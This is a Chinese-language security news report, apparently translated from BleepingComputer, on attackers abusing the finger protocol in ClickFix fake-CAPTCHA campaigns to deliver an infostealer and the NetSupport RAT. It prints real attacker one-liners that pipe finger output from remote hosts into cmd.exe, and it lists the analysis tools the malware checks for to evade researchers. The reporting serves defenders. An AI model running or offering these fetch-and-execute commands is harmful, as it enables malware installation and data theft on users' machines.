网易首页 > 网易号 > 正文 申请入驻

Finger协议遭滥用 沦为 ClickFix 恶意软件攻击工具

0
分享至


有着数十年历史的finger协议正重新活跃,威胁者借助这一协议获取远程指令,在Windows设备上执行恶意操作。

过去,人们通过Finger协议,在Unix与Linux系统中使用finger命令查询本地及远程用户信息,该命令后续也被加入Windows系统。尽管目前仍受支持,但相较于数十年前的普及度,如今其使用率已大幅下降。

执行finger命令后,会返回用户的基础信息,包括登录名、用户名(若在/etc/passwd中设置)、主目录、电话号码、最后活跃时间及其他详情。


手指命令输出

近期,多起恶意攻击活动开始利用Finger协议,疑似通过“ClickFix攻击”获取指令并在设备上执行。

这并非finger命令首次被如此滥用——早在2020年,研究人员就曾发出警告,指出该命令已被用作“ Living-off-the-Land Binary( LOLBIN,合法系统工具滥用)”,用于下载恶意软件并规避检测。


finger命令遭恶意滥用

上月,网络安全研究员分享了一个批处理文件。该文件执行后,会运行“finger root@finger.nateams[.]com”命令,从远程finger服务器获取指令,再通过管道符传递给cmd.exe在本地执行。


手指命令输出

目前该服务器已无法访问,但MalwareHunterTeam又发现了更多利用finger命令的恶意软件样本与攻击活动。例如,Reddit平台上有用户近期发文警示,称自己遭遇了一场伪装成验证码验证的ClickFix攻击——攻击者诱导其运行一条Windows命令,以“证明自己是人类”。

尽管目前该服务器已不再响应finger请求,但另一位Reddit用户捕获了此前的输出结果。这类攻击将Finger协议用作远程脚本传输工具:通过运行“finger vke@finger.cloudmega[.]org”命令,将输出结果通过管道符传递给Windows命令处理器cmd.exe。

这一操作会触发获取到的指令执行:创建随机命名的路径,将curl.exe复制为随机文件名,通过重命名后的curl程序从cloudmega[.]org下载伪装成PDF文件的压缩包,并解压出一个Python恶意软件包。


伪装成PDF的档案内容

随后,系统会通过“pythonw.exe __init__.py”命令执行该Python程序。最终执行的指令会向攻击者的服务器回传“执行成功”的确认信息,同时向用户显示伪造的“验证你是人类”提示框。

目前尚不清楚该Python恶意软件包的具体用途,但从一个关联批处理文件可推断,其应为一款信息窃取工具。

安全员还发现了另一项类似攻击活动:通过“finger Kove2@api.metrics-strange.com | cmd”命令获取并执行指令,操作流程与上述ClickFix攻击几乎一致。


finger命令的输出

分析发现,这一攻击手段更为成熟——指令会先检测设备中是否存在恶意软件研究常用工具,若发现则终止攻击。这些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

若未检测到恶意软件分析工具,指令会下载伪装成PDF的压缩包并解压。但与此前不同的是,该压缩包中并非Python恶意软件包,而是NetSupport Manager远程访问工具(RAT)安装包。


NetSupport Manager RAT

随后,指令会配置一个计划任务,确保用户登录时自动启动该远程访问恶意软件。

目前来看,此类finger命令滥用活动似乎由单一威胁者发起,且主要通过ClickFix攻击实施。但鉴于仍有用户持续上当,相关攻击活动需引起高度警惕。

对于防御方而言,阻止finger命令滥用的最佳方式是拦截流向TCP 79端口的出站流量——该端口是Finger协议用于连接守护进程的专用端口。

参考及来源:https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
兰州瓜农刺死城管案一审宣判,法院:被害方对案件发生有明显过错

兰州瓜农刺死城管案一审宣判,法院:被害方对案件发生有明显过错

新京报
2026-01-06 13:11:19
突发!大三甲女院长任上被查!此前该院院长、副院长接连被查

突发!大三甲女院长任上被查!此前该院院长、副院长接连被查

梅斯医学
2026-01-06 07:52:59
一位资深班主任发现,那些悄悄变好的孩子,父母都在做这4件事

一位资深班主任发现,那些悄悄变好的孩子,父母都在做这4件事

新东方家庭教育
2026-01-06 10:06:36
蓝营大佬重出江湖、作出3大承诺!郑丽文用1句话、让江启臣丢尽脸

蓝营大佬重出江湖、作出3大承诺!郑丽文用1句话、让江启臣丢尽脸

博览历史
2026-01-06 15:16:22
森碟下巴后缩矫正成功!近照已成标准瓜子脸,正畸前后对比变化大

森碟下巴后缩矫正成功!近照已成标准瓜子脸,正畸前后对比变化大

徐云流浪中国
2026-01-06 16:02:24
温铁军:中国被美国扒掉了两层皮,竟还有人妄想让中国做美的助手

温铁军:中国被美国扒掉了两层皮,竟还有人妄想让中国做美的助手

长星寄明月
2026-01-01 06:06:56
H灯+初恋脸!这位业界'宅男女神'的起起落落,比漫画还精彩!

H灯+初恋脸!这位业界'宅男女神'的起起落落,比漫画还精彩!

素然追光
2026-01-06 02:41:31
董璇携女拍新年美照 母女同穿紫旗袍温馨养眼

董璇携女拍新年美照 母女同穿紫旗袍温馨养眼

述家娱记
2026-01-05 15:03:25
唇语解读维尼修斯不满:每个人都带球却不传球,最后我还挨嘘

唇语解读维尼修斯不满:每个人都带球却不传球,最后我还挨嘘

懂球帝
2026-01-06 08:15:07
活雷锋:切尔西豪掷1.6亿帮助皇家马德里和维尼修斯打破续约僵局

活雷锋:切尔西豪掷1.6亿帮助皇家马德里和维尼修斯打破续约僵局

油泼辣不辣
2026-01-06 07:08:51
杨瀚森座位有变动,领先21分也不给上,斯普利特这招太狠了!

杨瀚森座位有变动,领先21分也不给上,斯普利特这招太狠了!

兰亭墨未干
2026-01-06 15:32:19
事业巅峰远赴美国,被老外“玩腻”后晚年回国,如今变成了这样!

事业巅峰远赴美国,被老外“玩腻”后晚年回国,如今变成了这样!

归史
2025-12-09 11:10:44
61岁李在明对59岁韩国第一夫人,不仅是灵魂依赖,更是生理性喜欢

61岁李在明对59岁韩国第一夫人,不仅是灵魂依赖,更是生理性喜欢

以茶带书
2026-01-05 13:04:53
2026年物业新规1月1日施行!物业费、公共收益、维权全明确

2026年物业新规1月1日施行!物业费、公共收益、维权全明确

另子维爱读史
2026-01-03 21:36:56
吴绮莉26岁女儿近况曝光。在香港开设计工作室,自曝收入够给房租

吴绮莉26岁女儿近况曝光。在香港开设计工作室,自曝收入够给房租

艳儿说电影
2026-01-06 16:01:21
紫牛头条|野生小鸟被困南京奥体中心游泳馆近一年 记者探访:在泳客投喂下“安家”,去留引热议

紫牛头条|野生小鸟被困南京奥体中心游泳馆近一年 记者探访:在泳客投喂下“安家”,去留引热议

扬子晚报
2026-01-06 07:14:20
彻底把中国打醒!美军作战布局?中国早已清楚,绝不姑息

彻底把中国打醒!美军作战布局?中国早已清楚,绝不姑息

马蹄烫嘴说美食
2026-01-06 12:27:45
美企拒绝接管委内瑞拉石油?特朗普喊话去接盘,巨头们为何沉默了

美企拒绝接管委内瑞拉石油?特朗普喊话去接盘,巨头们为何沉默了

说故事的阿袭
2026-01-06 04:00:14
挑衅原配、“睡”遍京圈,定居美国7年的徐静蕾,私生活太狂野了

挑衅原配、“睡”遍京圈,定居美国7年的徐静蕾,私生活太狂野了

时光在作祟
2025-12-27 18:37:45
马杜罗拒不认罪,大批美国军机忽然飞往欧洲,特朗普:印度再买俄油就给他加税 | 狼叔看世界

马杜罗拒不认罪,大批美国军机忽然飞往欧洲,特朗普:印度再买俄油就给他加税 | 狼叔看世界

狼叔看世界
2026-01-06 15:26:11
2026-01-06 16:56:49
嘶吼RoarTalk incentive-icons
嘶吼RoarTalk
不一样的互联网安全新视界
8113文章数 10545关注度
往期回顾 全部

科技要闻

速看!黄仁勋万字实录:甩出"物理AI"王牌

头条要闻

美高官:委官员已私下保证 将满足美提出的条件和要求

头条要闻

美高官:委官员已私下保证 将满足美提出的条件和要求

体育要闻

从NBA最菜首发控卫,到NBA最强乔治

娱乐要闻

朱媛媛遗作《小城大事》定档1月10日

财经要闻

丁一凡:中美进入相对稳定的竞争共存期

汽车要闻

摩登出街潮品 实拍奇瑞QQ冰淇淋女王版

态度原创

教育
本地
手机
数码
艺术

教育要闻

从川大到华沙大学,用小语种链接中欧:一位政治学博士的跨专业成长之路

本地新闻

云游内蒙|初见呼和浩特,古今交融的北疆都会

手机要闻

苹果马年微信红包封面/壁纸来了:免费领!

数码要闻

微星CES 2026秀AI迷你PC矩阵,押注英特尔、AMD与英伟达平台

艺术要闻

2026马年赵孟頫高清集字春联大放送,收藏备用!

无障碍浏览 进入关怀版